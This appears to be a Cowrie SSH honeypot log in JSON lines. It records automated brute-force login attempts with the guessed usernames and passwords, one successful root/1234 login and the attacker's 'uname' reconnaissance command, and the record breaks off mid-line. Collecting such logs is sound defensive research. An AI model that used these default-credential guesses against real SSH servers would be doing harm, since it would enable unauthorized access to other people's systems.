{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T21:56:19.162335Z","src_ip":"80.94.95.112","session":"a9ef5b58d5cc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nickels","message":"login attempt [admin/nickels] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:19.366766Z","src_ip":"80.94.95.112","session":"a9ef5b58d5cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39576,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1dc3de59898","protocol":"ssh","message":"New connection: 212.227.125.160:39576 (1.2.3.4:22) [session: c1dc3de59898]","sensor":"my-vps","timestamp":"2025-08-26T21:56:19.757955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:56:19.776255Z","src_ip":"212.227.125.160","session":"c1dc3de59898"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:56:19.826168Z","src_ip":"212.227.125.160","session":"c1dc3de59898"}
{"eventid":"cowrie.login.failed","username":"vscode","password":"vscode","message":"login attempt [vscode/vscode] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:20.028767Z","src_ip":"212.227.125.160","session":"c1dc3de59898"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nfy.irf","message":"login attempt [admin/nfy.irf] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:20.399774Z","src_ip":"80.94.95.112","session":"a9ef5b58d5cc"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:21.093608Z","src_ip":"212.227.125.160","session":"c1dc3de59898"}
{"eventid":"cowrie.login.failed","username":"admin","password":"naples","message":"login attempt [admin/naples] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:21.432536Z","src_ip":"80.94.95.112","session":"a9ef5b58d5cc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nacked","message":"login attempt [admin/nacked] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:22.465541Z","src_ip":"80.94.95.112","session":"a9ef5b58d5cc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"mystical","message":"login attempt [admin/mystical] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:23.498225Z","src_ip":"80.94.95.112","session":"a9ef5b58d5cc"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:24.531085Z","src_ip":"80.94.95.112","session":"a9ef5b58d5cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34962,"dst_ip":"1.2.3.4","dst_port":22,"session":"3eedcca877b1","protocol":"ssh","message":"New connection: 212.227.125.160:34962 (1.2.3.4:22) [session: 3eedcca877b1]","sensor":"my-vps","timestamp":"2025-08-26T21:56:25.116480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:56:25.118025Z","src_ip":"212.227.125.160","session":"3eedcca877b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:56:25.186628Z","src_ip":"212.227.125.160","session":"3eedcca877b1"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:25.421818Z","src_ip":"212.227.125.160","session":"3eedcca877b1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:26.473593Z","src_ip":"212.227.125.160","session":"3eedcca877b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58586,"dst_ip":"1.2.3.4","dst_port":22,"session":"c875abdc10e5","protocol":"ssh","message":"New connection: 212.227.125.160:58586 (1.2.3.4:22) [session: c875abdc10e5]","sensor":"my-vps","timestamp":"2025-08-26T21:56:30.444403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:56:30.463257Z","src_ip":"212.227.125.160","session":"c875abdc10e5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:56:30.509606Z","src_ip":"212.227.125.160","session":"c875abdc10e5"}
{"eventid":"cowrie.login.failed","username":"brute","password":"brute","message":"login attempt [brute/brute] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:30.828848Z","src_ip":"212.227.125.160","session":"c875abdc10e5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:31.881898Z","src_ip":"212.227.125.160","session":"c875abdc10e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53972,"dst_ip":"1.2.3.4","dst_port":22,"session":"1deaadaf6705","protocol":"ssh","message":"New connection: 212.227.125.160:53972 (1.2.3.4:22) [session: 1deaadaf6705]","sensor":"my-vps","timestamp":"2025-08-26T21:56:35.793651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:56:35.975075Z","src_ip":"212.227.125.160","session":"1deaadaf6705"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:56:35.976246Z","src_ip":"212.227.125.160","session":"1deaadaf6705"}
{"eventid":"cowrie.login.failed","username":"smtest","password":"smtest","message":"login attempt [smtest/smtest] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:36.250298Z","src_ip":"212.227.125.160","session":"1deaadaf6705"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:37.311147Z","src_ip":"212.227.125.160","session":"1deaadaf6705"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49358,"dst_ip":"1.2.3.4","dst_port":22,"session":"470d197cd9f8","protocol":"ssh","message":"New connection: 212.227.125.160:49358 (1.2.3.4:22) [session: 470d197cd9f8]","sensor":"my-vps","timestamp":"2025-08-26T21:56:41.245987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:56:41.247137Z","src_ip":"212.227.125.160","session":"470d197cd9f8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:56:41.299001Z","src_ip":"212.227.125.160","session":"470d197cd9f8"}
{"eventid":"cowrie.login.failed","username":"hdfs","password":"hdfs","message":"login attempt [hdfs/hdfs] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:41.470092Z","src_ip":"212.227.125.160","session":"470d197cd9f8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:42.622511Z","src_ip":"212.227.125.160","session":"470d197cd9f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44752,"dst_ip":"1.2.3.4","dst_port":22,"session":"e80d5ddad686","protocol":"ssh","message":"New connection: 212.227.125.160:44752 (1.2.3.4:22) [session: e80d5ddad686]","sensor":"my-vps","timestamp":"2025-08-26T21:56:47.099903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:56:47.100987Z","src_ip":"212.227.125.160","session":"e80d5ddad686"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:56:47.152807Z","src_ip":"212.227.125.160","session":"e80d5ddad686"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:56:47.311800Z","src_ip":"212.227.125.160","session":"e80d5ddad686"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:56:47.490210Z","src_ip":"212.227.125.160","session":"e80d5ddad686"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:56:47.490930Z","src_ip":"212.227.125.160","session":"e80d5ddad686"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:47.553089Z","src_ip":"212.227.125.160","session":"e80d5ddad686"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:47.554431Z","src_ip":"212.227.125.160","session":"e80d5ddad686"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40138,"dst_ip":"1.2.3.4","dst_port":22,"session":"f49f9b0b6fda","protocol":"ssh","message":"New connection: 212.227.125.160:40138 (1.2.3.4:22) [session: f49f9b0b6fda]","sensor":"my-vps","timestamp":"2025-08-26T21:56:52.244113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:56:52.330589Z","src_ip":"212.227.125.160","session":"f49f9b0b6fda"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:56:52.331377Z","src_ip":"212.227.125.160","session":"f49f9b0b6fda"}
{"eventid":"cowrie.login.failed","username":"gitlab-psql","password":"gitlab-psql","message":"login attempt [gitlab-psql/gitlab-psql] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:52.995729Z","src_ip":"212.227.125.160","session":"f49f9b0b6fda"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:54.317646Z","src_ip":"212.227.125.160","session":"f49f9b0b6fda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35522,"dst_ip":"1.2.3.4","dst_port":22,"session":"b69b9b2a73cd","protocol":"ssh","message":"New connection: 212.227.125.160:35522 (1.2.3.4:22) [session: b69b9b2a73cd]","sensor":"my-vps","timestamp":"2025-08-26T21:56:58.121520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:56:58.128038Z","src_ip":"212.227.125.160","session":"b69b9b2a73cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:56:58.172375Z","src_ip":"212.227.125.160","session":"b69b9b2a73cd"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-26T21:56:58.665263Z","src_ip":"212.227.125.160","session":"b69b9b2a73cd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:56:59.984650Z","src_ip":"212.227.125.160","session":"b69b9b2a73cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59138,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e75444c566c","protocol":"ssh","message":"New connection: 212.227.125.160:59138 (1.2.3.4:22) [session: 7e75444c566c]","sensor":"my-vps","timestamp":"2025-08-26T21:57:04.639498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:57:04.640776Z","src_ip":"212.227.125.160","session":"7e75444c566c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sh